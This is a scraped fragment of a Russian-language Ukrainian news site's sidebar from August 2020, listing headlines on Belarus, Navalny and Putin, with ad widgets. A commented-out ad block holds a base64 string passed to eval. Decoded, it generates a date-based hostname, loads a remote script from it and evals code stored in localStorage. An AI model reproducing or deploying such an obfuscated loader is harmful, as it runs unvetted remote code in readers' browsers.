href="https://enovosty.com/politika/full/308-nikolaj-davydyuk-mechta-putina-vexat-na-kolesnice-v-arku-pobedy-a-ryadom-chtoby-pokorno-shli-zelenskij-i-lukashenko">Николай Давыдюк: Мечта Путина - въехать на колеснице в «арку победы», а рядом чтобы покорно шли Зеленский и Лукашенко</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4813637"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/3107-itogi-iyulya-donbass-mezhdu-mirom-i-vojnoj-tresk-prognivshego-rezhima-i-kost-v-gorle-putina">Итоги июля: Донбасс между миром и войной, треск прогнившего режима и кость в горле Путина</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4813651"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/3107-ssha-i-kitaj-zdravstvuj-novaya-xolodnaya-vojna">США и Китай: здравствуй, новая холодная война!</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4813365"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2907-viktor-taran-novoe-peremirie-na-donbasse-mozhet-okazatsya-troyanskim-konem-dlya-ukrainy">Виктор Таран: Новое перемирие на Донбассе может оказаться «троянским конем» для Украины</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4812915"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2407-takaya-strannaya-armyano-azerbajdzhanskaya-vojna-komu-eto-vygodno-prichiny-novoj-eskalacii">Такая странная армяно-азербайджанская война: Кому это выгодно - причины новой эскалации</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4812322"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2007-sibir-i-dalnij-vostok-get-vid-moskvi">Сибирь и Дальний Восток: геть від Москви?..</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><br /><div id='div-gpt-ad-1594991505318-0' style='width: 100%; height: 376px;'> <script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594991505318-0'); });</script></div><br /><script async src="//whhrux.com/8ny1l7192ivl0mp/y03h8q768vuq/678ypkeqn6.php"></script><div data-la-block="dc72cd02-a35e-4362-9683-673dfde66e41"></div><br><script async src="//whhrux.com/50c7l1912vli/m0p30yh8q768vuq786pkybrgz6.php"></script><div data-la-block="fc0a9a9b-1dbe-46f7-b141-804f98afe650"></div><br /><div id="CVffjQ1zLagKNzI7JZ53" data-type="2" class="blockOfO1b2l3" ></div><script>window.RESOURCE_O1B2L3 = 'hvnwoeo.pro';</script><script src="//hvnwoeo.pro/2Zl.js" ></script><br /> <div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/2008-kurez-polskie-fermery-sobirayut-urozhaj-pryamo-sredi-novyx-mnogoetazhek-video"><img width="142" height="88" alt="Курьез: Польские фермеры собирают урожай прямо среди новых многоэтажек" src="https://enovosty.com/wp-content/uploads/2020/08/kombajn.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/2008-kurez-polskie-fermery-sobirayut-urozhaj-pryamo-sredi-novyx-mnogoetazhek-video">Курьез: Польские фермеры собирают урожай прямо среди новых многоэтажек</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_politics/full/2008-vtorzhenie-rossii-v-belarus-ustranenie-lukashenko-prorossijskoe-lobbi-v-ukraine-sudba-zelenskogo-xabarovsk-intervyu-s-piontkovskim-video"><img width="142" height="88" alt="Вторжение России в Беларусь, устранение Лукашенко, пророссийское лобби в Украине, судьба Зеленского, Хабаровск. Интервью с Пионтковским" src="https://enovosty.com/wp-content/uploads/2020/08/lukashenko3.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/2008-vtorzhenie-rossii-v-belarus-ustranenie-lukashenko-prorossijskoe-lobbi-v-ukraine-sudba-zelenskogo-xabarovsk-intervyu-s-piontkovskim-video">Вторжение России в Беларусь, устранение Лукашенко, пророссийское лобби в Украине, судьба Зеленского, Хабаровск. Интервью с Пионтковским</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/2008-korova-v-nebe-nad-shvejcarskimi-alpami-lyudi-uvideli-letayushhuyu-korovu-video"><img width="142" height="88" alt="Корова в небе: над швейцарскими Альпами люди увидели летающую корову" src="https://enovosty.com/wp-content/uploads/2020/08/2020-08-20-2.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/2008-korova-v-nebe-nad-shvejcarskimi-alpami-lyudi-uvideli-letayushhuyu-korovu-video">Корова в небе: над швейцарскими Альпами люди увидели летающую корову</a></div></td></tr><tr><td class="view"><span><i></i>8512</span></td><td class="view"><span><i></i>3966</span></td><td class="view last"><span><i></i>3477</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_incidents/full/1908-na-zakarpate-gorod-ushel-pod-vodu-video"><img width="142" height="88" alt="Украинская Венеция: на Закарпатье город ушел под воду после сильного ливня" src="https://enovosty.com/wp-content/uploads/2020/08/2020-08-19-32.png" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_incidents/full/1908-na-zakarpate-gorod-ushel-pod-vodu-video">Украинская Венеция: на Закарпатье город ушел под воду после сильного ливня</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/2308-lukashenko-priletel-v-dvorec-nezavisimosti-na-vertolete-i-vyshel-s-avtomatom-v-rukax-video"><img width="142" height="88" alt="Лукашенко прилетел во Дворец независимости на вертолете и вышел с автоматом в руках" src="https://enovosty.com/wp-content/uploads/2020/08/luka_avtomat.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/2308-lukashenko-priletel-v-dvorec-nezavisimosti-na-vertolete-i-vyshel-s-avtomatom-v-rukax-video">Лукашенко прилетел во Дворец независимости на вертолете и вышел с автоматом в руках</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_abroad/full/2008-vypil-chaj-i-zakrichal-poyavilos-video-s-navalnym-pered-gospitalizaciej"><img width="142" height="88" alt="Выпил чай и закричал: Появилось видео с Навальным перед госпитализацией" src="https://enovosty.com/wp-content/uploads/2020/08/navalniy.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/2008-vypil-chaj-i-zakrichal-poyavilos-video-s-navalnym-pered-gospitalizaciej">Выпил чай и закричал: Появилось видео с Навальным перед госпитализацией</a></div></td></tr><tr><td class="view"><span><i></i>3403</span></td><td class="view"><span><i></i>3252</span></td><td class="view last"><span><i></i>2691</span></td></tr></table><div class="more"><a href="https://enovosty.com/video">Все Видео</a></div></div><br> <div class="wiget text_chit"><p style="margin:0; padding-left:10px; font-size: 12px;">Читайте также</p><table cellpadding="0" cellspacing="0" border="0" class="table_chit"><tr><td> <a class="postTitle" href="https://enovosty.com/news_politics/full/2508-kak-kreml-razduvaet-ogon-v-evrope-ukraina-i-belarus-na-peredovoj-intervyu-s-romanom-bessmertnym-video" rel="bookmark">Как Кремль раздувает огонь в Европе. Украина и Беларусь на передовой. Интервью с Романом Бессмертным (ВИДЕО)</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-kreml-mozhet-fizicheski-likvidirovat-lukashenko-ili-zagnat-ego-v-tupik-ekspert" rel="bookmark">Кремль может физически ликвидировать Лукашенко или загнать его в тупик, - эксперт</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_politics/full/2508-v-ukraine-xotyat-predostavit-lgoty-belorusam" rel="bookmark">В Украине хотят предоставить льготы белорусам</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-moskva-reanimiruet-soyuznoe-gosudarstvo-s-belarusyu-bez-ogovorok-zloj-odessit" rel="bookmark">Москва реанимирует “союзное государство” с Беларусью – без оговорок, - "Злой одессит"</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-v-belarusi-nachalsya-prizyv-voennyx-iz-zapasa" rel="bookmark">В Беларуси начался призыв военных из запаса</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-v-belarusi-prodolzhayutsya-presledovaniya-oppozicionerov-laureata-nobelevskoj-premii-vyzvali-na-dopros" rel="bookmark">В Беларуси продолжаются преследования оппозиционеров: лауреата Нобелевской премии вызвали на допрос</a><br /></td> </tr><tr><td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2308-put-svobody-ot-vilnyusa-do-granizi-s-belarusyu-desyatki-tysyach-chelovek-vstali-v-zhivuyu-cep-solidarnosti-s-belorusami-foto" rel="bookmark">«Путь свободы» от Вильнюса до границы с Беларусью: десятки тысяч людей встали в живую цепь в Литве (ФОТО)</a><br /></td> <td> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2308-v-polshe-otvetili-pro-soblazn-otsech-grodnenskuyu-oblast-belarusi" rel="bookmark">В Польше ответили про соблазн «отсечь» Гродненскую область Беларуси</a><br /></td> </tr><tr></tr></table></div><div class="bannerB"><div id="phoenix57c02c9d4f32fe394547dcf1"></div><script>var site_id = "57768bd94f32fe17ccf62bcc";var widget_id = "57c02c9d4f32fe394547dcf1";</script><script src="//phoenix-widget.com/static/js/jsonp.js"></script></div><!--<div id="MIXADV_6543" class="MIXADVERT_NET"></div><script>var node6543 = document.getElementById("MIXADV_6543");if( node6543 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=6543&r="+Math.random();
node6543.parentNode.appendChild(script);script.onerror = function(){window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDY1NDMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNjU0My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTY1NDMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTY1NDMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjY1NDMiKSkgfSwgNTAwMCk7ICA7fTsg") );}}</script>
--><div class="wiget simple_pr" style="margin:0 0 10px;display:block; position:relative;" id="theme_posts"> <div class="caption "> <p>Новости мира</p><div class="popular-sort"><div class="sort"><a id="theme_31" onClick="getThemePopPosts(31, '4244,8', 4244, 15)">месяц</a></div><div class="sort"><a id="theme_7"style="text-decoration: underline;" onClick="getThemePopPosts(7, '4244,8', 4244, 15)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="theme_1" onClick="getThemePopPosts(1, '4244,8', 4244, 15)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <h3 class="press"><a href="https://enovosty.com/news_abroad/full/2008-kurez-polskie-fermery-sobirayut-urozhaj-pryamo-sredi-novyx-mnogoetazhek-video">Курьез: Польские фермеры собирают урожай прямо среди новых многоэтажек (ВИДЕО) (8509)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2208-poyavilis-podrobnosti-lecheniya-navalnogo-v-germanii-pod-kontrolem-armii-frg">Появились подробности лечения Навального в Германии: под контролем медиков армии ФРГ (5964)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2008-plotina-oznachaet-nashu-smert-pered-egiptom-voznikla-strashnaya-ugroza-foto">«Плотина означает нашу смерть»: перед Египтом возникла страшная угроза (ФОТО) (4801)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2108-putina-otstranyayut-ot-vlasti-eks-razvedchik-kgb-shvec-sdelal-rezonansnoe-zayavlenie-o-sobytiyax-v-rf">Путина отстраняют от власти: Экс-разведчик КГБ Швец сделал резонансное заявление о событиях в РФ (4507)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2108-ejdman-est-tolko-odin-chelovek-kotoriy-mog-reshitsya-na-otravlenie-navalnogo">Есть только одна кандидатура человека, который мог решиться на отравление Навального, - Эйдман (4311)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2008-shpionskij-skandal-v-norvegii-za-chem-na-samom-dele-oxotilis-rossijskie-specsluzhby">Шпионский скандал в Норвегии: За чем на самом деле охотились российские спецслужбы (4107)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2308-nakanune-otravleniya-navalnyj-posetil-novosibirsk-gde-dejstvuet-virusologicheskij-centr-vektor-eks-razvedchik-kgb-shvec">Накануне отравления Навальный посетил Новосибирск, где действует вирусологический центр "Вектор" - экс-разведчик КГБ Швец (3763)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2008-korova-v-nebe-nad-shvejcarskimi-alpami-lyudi-uvideli-letayushhuyu-korovu-video">"Корова в небе": над швейцарскими Альпами люди увидели летающую корову (ВИДЕО) (3477)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2108-zaderzhannyj-sotrudnik-belaruskaliya-sbezhal-iz-otdela-kgb-cherez-fortochku">Задержанный сотрудник «Беларуськалия» сбежал из отдела КГБ через форточку (3407)</a></h3><h3 class="press"><a href="https://enovosty.com/news_abroad/full/2308-foto-dnya-marsh-novoj-belarusi-v-minske-v-vysoty-ptichego-poleta-foto">Фото дня: «Марш новой Беларуси» в Минске в высоты птичьего полета (ФОТО) (3288)</a></h3></div> </div><div class="mainarmiya"><p><a style="font-size: 17px;" href="https://enovosty.com/armiya">Армия</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4372452"><a href="https://enovosty.com/armiya/full/641-radiolokacionnaya-stanciya-mangust" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/07/mangust-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/07/mangust-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/07/mangust-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/07/mangust.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/641-radiolokacionnaya-stanciya-mangust" >Радиолокационная станция «Мангуст»</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4389084"><a href="https://enovosty.com/armiya/full/148-vertolet-agustawestland-aw101-velikobritaniya-italiya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/09/AgustaWestland_AW101-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/09/AgustaWestland_AW101-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/09/AgustaWestland_AW101-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/09/AgustaWestland_AW101.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/148-vertolet-agustawestland-aw101-velikobritaniya-italiya" >Вертолет AgustaWestland AW101 (Великобритания-Италия)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4402923"><a href="https://enovosty.com/armiya/full/736-samolet-mnogocelevoj-istrebitel-dassault-mirage-2000-franciya" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2014/11/mirage_2000-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/11/mirage_2000-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2014/11/mirage_2000-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/11/mirage_2000.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/736-samolet-mnogocelevoj-istrebitel-dassault-mirage-2000-franciya" >Самолет многоцелевой истребитель Dassault Mirage 2000 (Франция)</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4492883"><a href="https://enovosty.com/armiya/full/742-reaktivnaya-sistema-zalpovogo-ognya-bm-21k" ><img width="101" height="80" src="https://enovosty.com/wp-content/uploads/2015/12/BM21K-101x80.jpg" class="attachment-101x80 size-101x80 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/12/BM21K-101x80.jpg 101w, https://enovosty.com/wp-content/uploads/2015/12/BM21K-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/12/BM21K.jpg 280w" sizes="(max-width: 101px) 100vw, 101px" /></a><a class="postTitle" href="https://enovosty.com/armiya/full/742-reaktivnaya-sistema-zalpovogo-ognya-bm-21k" >Реактивная система залпового огня БМ-21К</a></div></td> </tr> </table> <a href="https://enovosty.com/armiya" class="allarmiya">Вся армия&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="mainperson"><p><a style="font-size: 17px;" href="https://enovosty.com/person">Персоны</a></p><table style="width:100%;"><tr><td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4301988"><a href="https://enovosty.com/person/full/423-yacenyuk-arsenij" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/06/yatsenuk-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/06/yatsenuk-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/06/yatsenuk.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/423-yacenyuk-arsenij" >Яценюк<br /> Арсений</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4312327"><a href="https://enovosty.com/person/full/melnichenko-andrej" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2013/09/melnichenko_edit-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2013/09/melnichenko_edit-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2013/09/melnichenko_edit.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/melnichenko-andrej" >Мельниченко<br /> Андрей</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4411853"><a href="https://enovosty.com/person/full/158-abromavichyus-ajvaras" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2014/12/abromavichus-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2014/12/abromavichus-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2014/12/abromavichus.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/158-abromavichyus-ajvaras" >Абромавичюс<br /> Айварас</a></div></td> <td style="width:24%;"><div style="border:none; padding-top:3px;" id="post-4435594"><a href="https://enovosty.com/person/full/235-lysenko-andrej" ><img width="112" height="88" src="https://enovosty.com/wp-content/uploads/2015/03/lysenko-112x88.jpg" class="attachment-112x88 size-112x88 wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2015/03/lysenko-112x88.jpg 112w, https://enovosty.com/wp-content/uploads/2015/03/lysenko.jpg 280w" sizes="(max-width: 112px) 100vw, 112px" /></a><a class="postTitle" href="https://enovosty.com/person/full/235-lysenko-andrej" >Лысенко<br /> Андрей</a></div></td> </tr> </table> <a href="https://enovosty.com/person" class="allperson">Все персоны&nbsp;&nbsp;&nbsp;&nbsp;>></a> </div><div class="wiget simple_pr" id="pop_posts"> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" style="text-decoration: underline;" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/news-auto/full/2508-stolice-zametili-unikalniy-avtomobil-foto">"Бэтмен приехал покушать бургеры": в Киеве на парковке заметили уникальный автомобиль (ФОТО) (12554)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2508-ukraincam-detalno-obyasnili-kak-proxodit-medosmotr-pered-shkoloj">Украинцам детально объяснили, как проходить медосмотр перед школой (3603)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2508-stalo-izvestno-kak-turciya-pozdravila-ukrainu-s-dnem-nezavisimosti">Турция незабываемо поздравила Украину с Днем Независимости (ФОТО) (3178)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/2508-lider-severnoj-korei-vpal-v-komu-smi">Лидер Северной Кореи впал в кому, - СМИ (3024)</a></p><p class="press"><a href="https://enovosty.com/news_technology/full/2508-budushhee-nachinaetsya-sejchas-v-ssha-ispytali-letayushhuyu-mashinu-foto-video">"Будущее начинается сейчас": В США испытали летающую машину (ФОТО, ВИДЕО) (2315)</a></p><p class="press"><a href="https://enovosty.com/society/full/2508-immunolog-andrej-volyanskij-zhestkij-karantin-rastyanet-pandemiyu-v-ukraine-na-dolgie-gody">Иммунолог Андрей Волянский: Жесткий карантин растянет пандемию в Украине на долгие годы (2018)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2508-na-okkupirovannom-donbasse-v-den-nezavisimosti-terroristy-ustroili-provokaciyu-shtab-oos">На оккупированном Донбассе в День Независимости террористы устроили провокацию, - штаб ООС (2011)</a></p><p class="press"><a href="https://enovosty.com/news_society/full/2408-foto-dnya-marsh-zashhitnikov-ukrainy-na-majdane-v-den-nezavisimosti">Фото дня: Марш защитников Украины на Майдане в День Независимости (1988)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/2508-rossiya-otomstila-za-smert-svoego-generala-v-sirii-sotni-pogibshix">Россия отомстила за смерть своего генерала в Сирии: сотни погибших (1984)</a></p><p class="press"><a href="https://enovosty.com/news_abroad/full/2508-pozdravlenie-s-dnem-nezavisimosti-iz-dubaya-samyj-vysokij-v-mire-neboskreb-podsvetili-cvetami-flaga-ukrainy">Поздравление с Днем Независимости из Дубая: самый высокий в мире небоскреб подсветили цветами флага Украины (1748)</a></p></div> </div></div> </div><style>#sidebarRight{margin-top:-227px}</style><div id="sidebarRight" style="width:300px;" ><form method="get" id="searchform" action="https://enovosty.com/"><div class="search300"> <input type="text" value="" name="s" id="s" /> <input type="hidden" name="arh_title" value="on"> <input type="hidden" name="arh_text" value="on"> <input type="hidden" name="arh_news" value="on"> <input type="hidden" name="arh_posts" value="on"><input type="submit" id="searchsubmit" value="Поиск" /></div></form><div class="wiget simple_pr socnet"><div class="caption"><p>Последние новости в соцсетях</p></div> <table><tr><td><a href="https://www.facebook.com/enovosty/" rel="nofollow" target="_blank" class="facebook"><i></i></a></td><td><a href="https://twitter.com/enovosty" rel="nofollow" target="_blank" class="twitter"><i></i></a></td><td><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" rel="nofollow" target="_blank" class="you_tube"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/You_Tube.png) no-repeat;"></i></a></td><td><a href="https://t.me/enovosty" rel="nofollow" target="_blank" class="telegram"><i style="background: url(https://enovosty.com/wp-content/themes/eizvestia/img/Telegram1_Obem1.png) no-repeat;"></i></a></td></tr></table></div><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:600px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="9027886280"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><div class="wiget simple_pr" style="margin-top:5px;"><div class="caption"><div class="popular-sort-link"><a href="https://enovosty.com/publications">Публикации</a></div></div> <p class="press"><a href="https://enovosty.com/publications/full/1008-starye-vagony-poezda-pod-otkos">Старые вагоны – поезда под откос</a></p><p class="press"><a href="https://enovosty.com/publications/full/708-ukrzaliznycya-ostalas-bez-koles">«Укрзализныця» осталась без колес</a></p><p class="press"><a href="https://enovosty.com/publications/full/2107-import-spisannyx-vagonov-iz-rossii-kak-prigovor-zdravomu-smyslu">Импорт списанных вагонов из России как приговор здравому смыслу</a></p></div><div id='div-gpt-ad-1594112815543-0'> <script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1594112815543-0'); });</script></div></br><div id="adriver_banner_C3"></div> <div class="wiget simple_line infblogs"> <div class="caption"><a href="https://enovosty.com/blogs">Мнения</a></div><div class="block"><div class="cblock"><a href="https://enovosty.com/blogs/full/1308-ostanovite-nasilie-zhyve-belarus"><img alt="Остановите насилие. Жыве Беларусь!" src="https://enovosty.com/wp-content/uploads/2020/08/oleg_savchenko_lsp_2020_4-112x89.jpg"><div>Олег Савченко</div></a></div><p><a class="postTitle" href="https://enovosty.com/blogs/full/1308-ostanovite-nasilie-zhyve-belarus">Остановите насилие. Жыве Беларусь!</a></p><span class="postExcerpt"><a href="https://enovosty.com/blogs/full/1308-ostanovite-nasilie-zhyve-belarus">Кумир белорусской молодежи, рэп-исполнитель и лидер группы «ЛСП» Олег Савченко эмоциально высказался о протестах в Беларуси и призвал остановить насилие. ...</a></span></div></div> <div class="wiget simple_pr" style="margin-top:5px;"><div> <div class="caption"> <div class="popular-sort-link"><a href="https://enovosty.com/novosti">Популярные новости</a></div><div class="popular-sort"><div class="sort"><a id="pop_posts_31" onClick="getPopPosts(31)">месяц</a></div><div class="sort"><a id="pop_posts_7" style="text-decoration: underline;" onClick="getPopPosts(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">популярные за&#160;&#160;<a id="pop_posts_1" onClick="getPopPosts(1)">сутки</a>&nbsp;&nbsp;|</div></div> </div> <div class="newsbody"> <p class="press"><a href="https://enovosty.com/politika/full/2008-andrej-piontkovskij-scenarij-putina-i-lukashenko-po-anshlyuzu-i-transferu-vlasti-v-belarusi-provalitsya">Андрей Пионтковский: Сценарий Путина и Лукашенко по аншлюсу и трансферу власти в Беларуси провалится (12642)</a></p><p class="press"><a href="https://enovosty.com/news-auto/full/2508-stolice-zametili-unikalniy-avtomobil-foto">"Бэтмен приехал покушать бургеры": в Киеве на парковке заметили уникальный автомобиль (ФОТО) (12559)</a></p><p class="press"><a 